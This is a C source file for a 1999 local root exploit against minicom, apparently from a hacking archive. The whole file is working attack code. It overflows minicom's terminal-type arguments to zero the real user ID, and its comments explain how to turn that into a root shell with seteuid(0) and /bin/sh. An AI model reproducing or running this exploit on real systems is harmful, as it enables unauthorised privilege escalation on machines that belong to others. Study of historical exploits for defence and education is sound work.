// minicom local root compromise
// abr (july 1999)
//
// you must get minicom to execute a shell, fortunately for you
// kermit prog can be user defined.
// we only overwrite real_uid so your euid will not be 0, create
// a small program doing seteuid (0); and system("/bin/sh"); to
// get euid=0 as well.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_TO_MINICOM "/usr/bin/minicom"
#define POSITION 0x34
#define BUFFER_LEN 100

void main (int argc, char *argv[])
{
  char buf1[BUFFER_LEN],buf2[BUFFER_LEN];
  char buf3[BUFFER_LEN],buf4[BUFFER_LEN];
  char prog[100];
  int pos=POSITION;

  bzero(prog, 100);
  if (argc>1)
    {
      strcpy(prog, argv[1]);
    }
  else
    {
      strcpy(prog, PATH_TO_MINICOM);
    }

  // other versions may have the real_uid stored at a different
  // location in memory.
  if (argc>2)
    pos=atoi(argv[2]);

  // pad out to real_uid
  memset(buf1, 'X', BUFFER_LEN);
  memset(buf2, 'X', BUFFER_LEN);
  memset(buf3, 'X', BUFFER_LEN);
  memset(buf4, 'X', BUFFER_LEN);

  // real_uid -> 0
  buf1[pos+0] = 0;
  buf2[pos+1] = 0;
  buf3[pos+2] = 0;
  buf4[pos+3] = 0;

  // execute minicom
  execl(prog, prog,
        "-t", buf4,
        "-t", buf3,
        "-t", buf2,
        "-t", buf1,
        "-t", "linux",   // if you don't have this termtype, change it
        (char *)0);
}
/*                    www.hack.co.za              [2000]*/